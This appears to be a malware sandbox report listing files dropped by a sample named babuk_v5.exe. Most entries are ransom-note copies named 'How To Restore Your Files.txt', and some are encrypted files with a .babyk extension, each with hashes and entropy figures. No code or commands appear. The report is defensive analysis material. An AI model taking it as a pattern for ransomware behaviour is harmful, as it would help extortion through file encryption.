                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.577972184978332
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlgdZiyE2GdHEhghxJU33k0W87nWCAalTeeyo+mfC6D9SXmUxNvEEn:QdMyE2GVcAAQ87nWCA4Bxrfd9SXm0vtn
                                                                            MD5:4FB9EB6DCBEC9B03E25DD5D939B16D00
                                                                            SHA1:988D58826B4F201C0F045C8417B9E30DA07CDE91
                                                                            SHA-256:5A20D7202DE203EB03101499D3A54A8287CC95CFDAB595536CD20E374C71E37F
                                                                            SHA-512:B27894113AC59C5861B265C0B241E325F8B762B417F87AB9159D8037F097B0F0E6231CEAAB7907BC909B87AAE7394FF79EFB794393F9BBE7C0FB1E502709056B
                                                                            Malicious:false
                                                                            Preview: ....!l....URD...I.a.......L?....s..m-.........q.>}.1...e.@D!._L...D.......#.........#p..w..r;..(....~...;H.P..s*.*L.\.U....%5..<......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.978507510401312
                                                                            Encrypted:false
                                                                            SSDEEP:96:qbre+O8ZKmTYlWS6MLttxOI+FwnH96aSSe0zMu4Fl00TYcA359exdxkX7U7zzCG6:giZeKm8AML9OEd664DN+CxP+yQaJtSKO
                                                                            MD5:DCCCE75DCD59F16A76D4C7363593A96F
                                                                            SHA1:147601FD05FD607BB72F95C0209708171C7E06FF
                                                                            SHA-256:F41D13DC4EDE93FFD719A493C5E5A7AC2357B0964F72A919295B1CCBEF582FD8
                                                                            SHA-512:A19913F9E9AA45AE2EB5DE653E1EEC5066A22123089F9526A9B24345E8DABAD07D40FAB644CDFC205488F8E4F9240908F5971A04D76863A6D03F5471188D76D5
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.416547092842832
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlSCj2PaQHySmHJubx2IbhVfXVpv41EIcEh9ll0UxNvEEn:iCjobHH8IbhVfXVO1EhEh9ll00vtn
                                                                            MD5:B8705B9DB96A387EEFE31775C014B72E
                                                                            SHA1:9436A06101799636483D10773EF0A5ECAB3C68BC
                                                                            SHA-256:B1AA11DD5A233118C1DC2774CCE83E66812121685C4EA66A34F1CC8D233D3DF6
                                                                            SHA-512:4549C7450069EE6EFD34C4ADEC78D86CF54F3B1B1FD2CD5424116B36503E1E0FA6C6543CD7B0F4CB4462CDE09BD00094AF063AF25869A73ED367F159AE48BCF6
                                                                            Malicious:false
                                                                            Preview: ........R7....2.d&...@u...D...(.#.[...P...f9./#g5'B''0..>3.)../n.fh......x/4.....a;.m.t.wud.VG.0z./..l>,?....tZD...aT..d.9a.J....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.978821503797643
                                                                            Encrypted:false
                                                                            SSDEEP:192:NjPwWIsfYamzqTPAeL8RO6Zpphm5oiBtPiIFNbhmh:NjRQqbAdROCppM7BsIjhmh
                                                                            MD5:5FAA7D068B9F6824B80F075A4CCEC134
                                                                            SHA1:B5B197BD302DBEDF7EF7E5B24B45C07776B90A0B
                                                                            SHA-256:29C913B33CA20DE431C508D91A95641FB2DD1D39CEB15AF2A240F6D2453D877E
                                                                            SHA-512:08BA8C618E3CBCF6D1ED3387EE75B5DF3270770E4E62C634EE1150E9F408360C8D0431E70152AB4E08CBD1FA7F774542CDD5756DF2FCC0A7ABFA49AF0517B778
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\HasRegisteredAsDefaultApp.setting.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):172
                                                                            Entropy (8bit):6.5037746936532566
                                                                            Encrypted:false
                                                                            SSDEEP:3:M+2FXvDkFBVUq35Zu6Mt/+/oZEeqFIpq5pScpdPfRiLUxNvEEn:M+2BCVX5ZuXt+czg13ScfgL0vtn
                                                                            MD5:3F4ECBE391B92BC921F7933608A66136
                                                                            SHA1:0F24062BAEF6AF1E9266CFA494A44EF65F78E42F
                                                                            SHA-256:B418A4E20441F0EED18CB89235E3F301E96AFB73CCC104E785B14324B99DAA56
                                                                            SHA-512:15998BE9B259DA78EA06027DDD224F0AAEEF127F65575577151B83C9D7FA1DDCD89EBE42C2E9046C25A77DA4A42BABC09217BFA106C26B7448890A29DB573279
                                                                            Malicious:false
                                                                            Preview: ........n-...!........'..&....$8......*.#.D...u...%...E.9.....j..6d..~Kx...QH.d.I.|^.S.DAhtz.8.rd ......._...N.7..D............@O.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
